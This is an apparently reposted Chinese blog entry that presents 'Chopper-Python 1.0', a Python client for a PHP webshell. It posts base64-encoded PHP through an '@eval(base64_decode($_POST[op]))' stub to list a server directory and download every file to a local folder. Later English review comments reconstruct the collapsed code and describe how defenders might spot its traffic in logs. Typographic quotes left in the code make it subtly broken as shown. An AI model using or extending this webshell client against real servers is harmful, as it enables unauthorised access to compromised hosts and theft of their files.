这是 Chopper-Python 1.0 版本,只实现了文件下载功能,而且没有很好地处理异常情况。期待下一个版本。
#! /usr/bin/env python #coding=utf-8 ‘‘‘ Soft: Chopper-Python version 1.0 Date: 2015/11/1 Author: Vicain ‘‘‘ from bs4 import BeautifulSoup from bs4 import NavigableString import requests import urllib import base64 import sys import os list_dir_op=""" function listDir($dirname){ header("Content-type:application/xml"); echo "<directory name=‘$dirname‘>"; if(is_dir($dirname)){ if($dir_stream = opendir($dirname)){ while(($file=readdir($dir_stream))!==false){ $current_file = $dirname."/".$file; if(is_dir($current_file)&&$file!=="."&&$file!==".."){ listDir($current_file); } elseif($file!=="."&&$file!==".."){ echo "<file name=‘$file‘></file>"; } } closedir($dir_stream); } echo "</directory>"; } } listDir("D:/wamp/www/mycode"); """ download_file_op=""" header("Content-Disposition:attachment"); readfile("file_name"); """ comment=""" 上面的php代码中,由于python会对‘\‘后面的字符进行转义,因此需要修改一下payload中的‘\‘... 我将路径全部统一成了‘/‘ """ url = "http://127.0.0.1/chopper.php" password = "jjy" file_list = [] def codeSet(): if(sys.getdefaultencoding()==‘ascii‘): reload(sys) sys.setdefaultencoding(‘utf-8‘) def postParameters(url,password,op): op = base64.b64encode(op) body = {password:"@eval(base64_decode($_POST[op]));","op":op} response = requests.post(url,data=body) soup = BeautifulSoup(response.text,"lxml") return soup.find(attrs={"name":"D:/wamp/www/mycode"}) #这里参数都是写死了的,只是作为测试! 
# NOTE(review): this listing was collapsed onto one line by extraction. The line
# breaks and indentation below are reconstructed (nesting inferred from the
# statement order), and the typographic quote characters are left as found.
def xmlParser(root): # recursively walk the files (author's note: "return the file list")
    # Walks the parsed <directory> element `root`. Nothing is returned: for each
    # <file> child the string p_name + "/" + name is appended to the global
    # file_list, and each <directory> child is visited recursively.
    global file_list
    p_name = root.attrs["name"]
    for sibling in root.contents:
        # Skip text nodes; only tag children carry .name / .attrs.
        if not(isinstance(sibling, NavigableString)):
            if sibling.name == "directory":
                s_dname = p_name+"/"+sibling.attrs["name"]  # assigned but not used afterwards
                xmlParser(sibling)
            if sibling.name == "file":
                s_fname = sibling.attrs["name"]
                file_list.append(p_name+"/"+s_fname)

def fileDownload(file_list,remote_dir,local_dir):
    # For every entry in file_list: fills the PHP readfile() template, posts it
    # to the module-level `url` with the same eval stub used elsewhere in this
    # file, and writes response.text to a local path.
    #
    # Defender view: this produces one POST per file, all to the same PHP URL,
    # each with a body containing "@eval(base64_decode($_POST[op]));" and a
    # base64 "op" field. In web-server logs that would presumably show up as a
    # burst of POSTs to a single script with response sizes tracking the sizes
    # of the files read.
    global download_file_op
    t_download_file_op = download_file_op
    for file in file_list:
        t_local_dir = local_dir
        t_download_file_op = t_download_file_op.replace("file_name",file) # replace file_name in the php script
        op = base64.b64encode(t_download_file_op)
        body = {password:"@eval(base64_decode($_POST[op]));","op":op}
        response = requests.post(url,data=body)
        # Local path = local_dir + last component of remote_dir + the part of
        # the remote path that follows remote_dir.
        local_file = t_local_dir.strip(‘/‘)+‘/‘+remote_dir.strip(‘/‘).split(‘/‘)[-1]+‘/‘+file.split(remote_dir)[1]
        # Parent directory of local_file; created when it does not exist yet.
        t_local_dir = ‘/‘.join(local_file.split(‘/‘)[0:-1])
        if(os.path.exists(t_local_dir)==False):
            os.makedirs(t_local_dir)
        with open(local_file,‘wb‘) as f:
            f.write(response.text)
        sys.stdout.write(local_file+" has been written successfully!\n")
        sys.stdout.flush()
    print ‘End...‘

def main():
    # Lists the hard-coded remote directory, flattens the XML listing into
    # file_list, then fetches every listed file into a hard-coded local folder.
    global file_list
    doc_xml = postParameters(url,password,list_dir_op)
    xmlParser(doc_xml)
    fileDownload(file_list,"D:/wamp/www/mycode/","c:/users/cain/desktop")

if __name__=="__main__":
    codeSet()
    main()
原文:http://www.cnblogs.com/vicain/p/4928598.html